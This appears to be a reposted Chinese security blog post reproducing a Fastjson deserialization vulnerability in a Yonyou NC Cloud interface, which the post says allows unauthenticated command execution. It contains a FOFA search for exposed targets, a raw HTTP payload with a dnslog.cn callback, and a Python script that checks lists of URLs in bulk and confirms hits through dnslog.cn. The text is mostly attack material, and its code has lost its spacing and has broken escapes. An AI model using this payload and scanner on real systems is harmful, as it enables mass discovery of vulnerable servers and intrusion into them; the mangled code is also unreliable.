用友NC Cloud的/ncchr/pm/ref/indiIssued/blobRefClassSearch接口存在反序列化漏洞,未经过身份认证的攻击者可以通过构造恶意的序列化请求在目标服务器上执行任意命令。
FOFA:
app="用友-NC-Cloud"用友-NC-CloudPOST /ncchr/pm/ref/indiIssued/blobRefClassSearch HTTP/1.1Host: x.x.x.xUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.4103.116 Safari/537.36Content-Type: application/json{"clientParam":"{"x":{"@type":"java.net.InetSocketAddress"{"address":,"val":"Test.Fastjson.dnslog.cn"}}}"}
脚本可直接后台回复 用友0728 获取
# encoding:utf-8importtimeimportrequestsimportargparseimportsslimporturllib3importrefromrequests.exceptionsimportRequestExceptionfromurllib3.exceptionsimportInsecureRequestWarning# ssl._create_unverified_context:创建一个 SSL 上下文,用于处理 HTTPS 请求时不验证服务器证书的情况。ssl._create_default_https_context = ssl._create_unverified_context# urllib3.disable_warnings():禁用 urllib3 库的不安全请求警告,即不显示由于不安全的 HTTPS 请求而引发的警告信息。urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)# 打印颜色RED ='�33[31m'GREEN ='�33[32m'RESET ='�33[0m'defcheck_vuln(url):url = url.strip("/")target = url +"/ncchr/pm/ref/indiIssued/blobRefClassSearch"headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36','Content-Type':'application/json'}headers1 = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.3","Cookie":"PHPSESSID=pgqapiopj5rssr6a2ejvsi69m3; b-user-id=98195658-f7ad-f233-35b2-5f6d469d240d"}dnslog_url ="http://dnslog.cn/getdomain.php"try:getdomain = requests.get(dnslog_url, headers=headers1, verify=False, timeout=20)domain = str(getdomain.text)data =f'{{"clientParam":"{{\"x\":{{\"@type\":\"java.net.InetSocketAddress\"{{\"address\":,\"val\":\"111111.{domain}\"}}}}}}"}}'response = requests.post(target, headers=headers, data=data, verify=False, timeout=20)foriinrange(0,3):refresh = requests.get(url='http://dnslog.cn/getrecords.php', headers=headers1, timeout=60)time.sleep(2)ifdomaininrefresh.text:print(f"{RED}[+]{url}存在YongYouNC-Cloud-blobRefClassSearch-fastjson反序列化漏洞{RESET}")returnTrueelse:print(f"{GREEN}[+]{url}不存在YongYouNC-Cloud-blobRefClassSearch-fastjson反序列化漏洞{RESET}")exceptrequests.exceptions.RequestExceptionase:print(f"{GREEN}[-]{url}请求失败{RESET}")defmain():parser = argparse.ArgumentParser(description='YongYouNC-Cloud-blobRefClassSearch-Fastjson反序列化漏洞检测')parser.add_argument('-u','--url', help='目标URL')parser.add_argument('-f','--file', help='目标URL文件')args = parser.parse_args()ifargs.url:url ="http://"+ args.urlifnotargs.url.startswith(('http://','https://'))elseargs.urlcheck_vuln(url)elifargs.file:withopen(args.file,'r')asf:urls = f.read().splitlines()forurlinurls:url ="http://"+ urlifnoturl.startswith(('http://','https://'))elseurlcheck_vuln(url)if__name__ =='__main__':main()
python.YongYouNC-Cloud-blobRefClassSearch-Fastjson-Deserialization.py-f.1.txtpython.YongYouNC-Cloud-blobRefClassSearch-Fastjson-Deserialization.py-u192.168.1.1::8088
原文始发于微信公众号(扫地僧的茶饭日常):【漏洞复现】用友NC-Cloud接口blobRefClassSearch存在FastJson反序列化漏洞 (附批量验证脚本)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论